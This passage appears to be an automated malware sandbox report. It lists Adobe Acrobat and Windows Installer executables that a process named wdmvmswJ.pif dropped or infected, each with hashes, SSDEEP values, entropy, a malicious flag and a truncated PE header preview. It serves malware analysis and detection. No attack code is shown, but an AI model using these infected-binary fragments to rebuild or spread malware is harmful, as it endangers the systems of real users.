                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.157431696461628
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:sWBWcXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:sWBWcsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:ED94028E194174E15527557784FDA115
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:77D35D6C885A12FB4B1F9306F567CBC3B856AEBF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5B6610385ED7DE0ACDB057AC730F53AF55E8D5C1FDECAB1F6208316DCA92203C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A43A5FB32B97FD760ED321DF969A5966B59F646C453E6B58CBEB32918A0B2EC47D6E6E00DEC6E1FC596AFE559E2FCB5E1B22D308EA211411F271FF75426E4A78
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.228523775824454
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:uf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0PsqjnhMgeiCl7G0nehbGZpbD:u+GtCi27mVTyT+a0zDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:28F901D0930EC6F478AB7A9A711A7B73
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DB6F17D79B310B6079185D382F4E6258030B9B89
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7F710F02F195DAE877F1EC5002264D3DEB50CB0B7CB6FF8B0EA91850CE1A6AEA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:FF890C9F6E388F81AE704AD0BFBD9E00560984ADDD4DC5F9B1928E107B7441C4114C8B72178CA0A3DCA0CAE6E7BCD82191679D93793E59F5680945B921915C54
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.649686741673421
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:9U198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeY8Dmg27RnWGj:y2NfHOIK5Ns6qR96D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:E1787DFB38574AEE81DC7B5191C5BFB1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4917AFD2DEBBE222578EA30E849E6FC47F28E8E3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:ABA3E8B5A7AC69DB391DE5C9CB4C7B2DF3A84E2AF751CCEC376EAD8120AC6A46
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:51FF58DE6557CD6F5C22D26397E145912B1E7B60E5E60D774562989093238A88354BA53C16CA164EBB07AC0825F7680B225344EFE133830318B4F0777A235EAE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0.....RR0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1588224
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.531950946584056
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:DkcWTUQcydYsqjnhMgeiCl7G0nehbGZpbD:DhKULDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:BE523A69217F0C52253929373529FC9C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3C8BF0C08A464CB8F4BD8C8ADCE0DFF8F57A4DBA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:910C3B1654677DB9E8C7B4CD198B5079CDDB399ACF19E7598F914CEA00D2FE11
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:254B2AECE677F1562F6B291E7A845C5647D81743DA1F2D0881F6DFDB19347F12EA0CE35973E429CE59206011ED8AA9DBD6F40769B2265B470009FCB1644AB4AF
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.......................................... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1338368
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.352685605231213
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:/fY+FUB/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/A+qB/sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:E5E8A4D3B80434038F556A01207CEDC0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5417C3022B4E7E2360F775094A5A7344964BE216
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6FC68F7A82D336FE33FFD8052875CEABEBEEC9C5A6A92D841750DA4051113478
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B60E70D07485E50CD69D6F3A949334ECE0E01D7557F48EB73900B028C3055641F4A04F1FA2052927EA5FC42A331275E17D2F9ACAC54A511A37CCF2AEA86C9457
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................................................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1143296
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.022691135028792
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:PXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:59AC573B0AB47617A57250C1FB2BD819
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3643FE706F18184261EA58121FBE45EE6603F54E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:49AA71E56CC269B6FBBA2489111DAAA150191EF2B844B6187FC9A19B34972F7A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:49B34189D57398CA447625CCBD293AA02F3CCD5D796BFB179E454EE2799CB399F4ADF2D1966A1441689830CDC251804EDD6AF97AEA850722BFB92B3A9071CBB6
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@...................................."U.... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1161728
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.047174545530065
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:5bXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:NsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:029CD2DD9F78A96FAF3DD5FABE0B9A56
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:04FE4892CB73C2C6671914F942D3DBBA282327C2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C122331E0570A91114CAEB4FBE652FF24073F84EDA34ABB2B6B354DF81C4C3AA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D0933E8322414FA396BABE241B66629AF3953010A69EE6E2A8AF9117F74CD1F2088DBE90033CB67A75D449D19DC0AF92908229BFC62E6BF35719ABAB6E12664A
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.499809129428079
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:AtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755ODmg27RN:AjEIa4HIEWOc5cD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:24850CF47AE8D24178666AA98D3FD859
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:944F8DB1D7A852529E2FE611B1053AC5596C4B86
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:78F30D78DFB979B74C3BBD72910CE2A311D74D42439D228BE939A10CB72FE898
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1094627570879AD1BE73FDFB339C3B604A9E5282B7F82834358E9151D23A0EB87ECD475197AA72A51017C48DA4D17552D9A1FFDB4A59099EFC669E705FFDA9BD
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @......=@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999367333251777
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1572864:+Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:9XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:00F4E3638EAE431E9AA5E3003EC1F9EB
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DBF65D16AEFD0462585923577461775124E47D60
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:ECAF1A45B74F4D6FB3CD4046ECA277AC19B121054F6637C92385246EE77A6EAD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D9D0186FE313067150DCDA98217B0A1A9CE129F443C07CB24FB2AC9D4F25E1B1172E207CFEF6FDCEF2852053C6E1F01041AE12C2A9C7C1AA36EF1A10D341D521
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......A.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1230336
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.185621293858276
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:gejVWYUAbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:BjkY7bsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:57ED647FFF7F1A521004FD0AF775F1C8
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8BC2AA0F2C8A9258F595607D2F8FDEB2AC07A346
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7E6300A6B7A759E8E38FC47A002E816B0F1449066FA4FB9A38436FE3D4973BAC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:862F71A1F045DB7EC2813B565BBE3700A75B1F798CB7A7E982475E31E16D30327A037905F5F1F6DB9C23D9FE662DE6A38326589BDD997547BDE0732F37EF69BA
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..........................................................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1384960
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.377841856961679
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:xxwSJhkrmZsnsqjnhMgeiCl7G0nehbGZpbD:xy+krKs7Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:02D73FACDC924025BAD378B9FBD1C4C5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5D6338304B7FEF128F6635EB00C79E295973CBDA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:882BA0704538F2B1DC6685794C6D86BDA85A97B79EED717C3EF1103E4B825A62
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B40C930FC1222F64F9CB79B466717D21CCA06B21DDF9912231B6B10AE21CB78C46B0FF951CDFDB9DE2FA2CE51C5CEF95DF4D45C348444335CF0DF68C4BC985D4
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.......................................... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1649152
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.63276540329382
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:wHQJLIRgvsnNOsqjnhMgeiCl7G0nehbGZpbD:wHQJL34iDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:218AB30DE11869925A7A02A5619C700D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CC5EA9915E4ADFD34835D43641CC88300B5F3111
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:93BCE0CDFC3AC6F82A8EDFE798BE146C4EAC06CF0EA4D3BBEAF9394D871342FF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2C58C9BD8D688B23A7D882DDB09360A044FF46AF70A31A3F7EDF4F67B59F3C7BFF00D6ACBF502669DE065845BE5C4180CDEFCAC306F77DD3D3B49BAD2EF8A4D8
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@....................................<L.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.450982988719877
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:bUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kJ:AWmXL6DEC7dRpKuDQbghD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:3BF10C4C0F79625E9A3CFE4E77D1815A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:04FEC0F61483017B3A9302D1B40929CE50E7683F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6B4FF51E72630D4E942C055226D1EA0FECCFA4475368C11B8DEE6C5E0282CCE6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B9BB3920B98471CD139D166910F88BE0601A8F5D184188F142BC137F73F369C819254D1177D330F15462F0BBF41E20EB90ED694A43C2F5B04765E0C55D81D426
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9727822629984635
